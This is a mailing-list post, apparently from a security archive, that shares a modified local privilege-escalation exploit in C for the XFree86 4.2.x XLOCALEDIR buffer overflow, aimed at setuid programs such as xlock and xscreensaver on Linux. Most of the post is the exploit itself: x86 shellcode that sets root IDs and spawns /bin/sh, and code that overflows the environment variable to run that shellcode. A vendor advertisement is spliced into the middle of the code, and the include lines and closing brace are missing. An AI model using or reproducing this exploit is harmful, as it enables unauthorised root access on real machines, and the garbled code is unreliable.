Re: xscreensaver exploit for Redhat 7.3

Hi all,
exploit attached.

Comments are welcome.

Sincerely,

+-------------------------------------------------------------------+

| Agazzini Maurizio                       Tel:   +39-011-32.72.100  |

| Security Analyst                        Fax:   +39-011-32.46.497  |

| @ Mediaservice.net S.R.L.          D.S.D. Data Security Division  |

|                                                                   |

| PGP Key   : http://www.wayreth.eu.org/Inode.asc                   |


| Disclaimer: 
http://@Mediaservice.net/disclaimer                   |


+-------------------------------------------------------------------+

/*

	Original exploit:
		** oC-localX.c - XFree86 Version 4.2.x local root exploit
		** By dcryptr && tarranta / oC

	This exploit is a modified version of the original oC-localX.c
	built to work without any offset. 

	Some distro have the file: /usr/X11R6/bin/dga +s
	This program isn't exploitable because it drops privileges
	before running the Xlib function vulnerable to this overflow.

	This exploit works on linux x86 on all distro. 

	Tested on:	
		- Slackware 8.1 ( xlock, xscreensaver, xterm)
		- Redhat 7.3 ( manual +s to xlock )
		- Suse 8.1 ( manual +s to xlock )

	by Inode 

*/

#include 
#include 
#include 
#include 

static char shellcode[] =

        /* setresuid(0,0,0); */
 	"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
        /* /bin/sh execve(); */
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
        "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
        /* exit(0); */
        "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

#define ALIGN 0

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

int main(int argc, char **argv)
{

	char 	buffer[6000];
	int i;
	int ret;
	char *env[3] = {buffer,shellcode,  NULL}; 

	int *ap;

	strcpy(buffer, "XLOCALEDIR=");

	printf("\nXFree86 4.2.x Exploit modified by Inode \n\n");
	if( argc != 3 )
	{
		printf(" Usage: %s  \n",argv[0]);
		printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n",argv[0]);
		return 1;
	}

	ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]) ;

	ap = (int *)( buffer + ALIGN + strlen(buffer) );

	for (i = 0; i < sizeof(buffer); i += 4)
		*ap++ = ret;
	
	execle(argv[1], argv[2], NULL, env);

	return(0);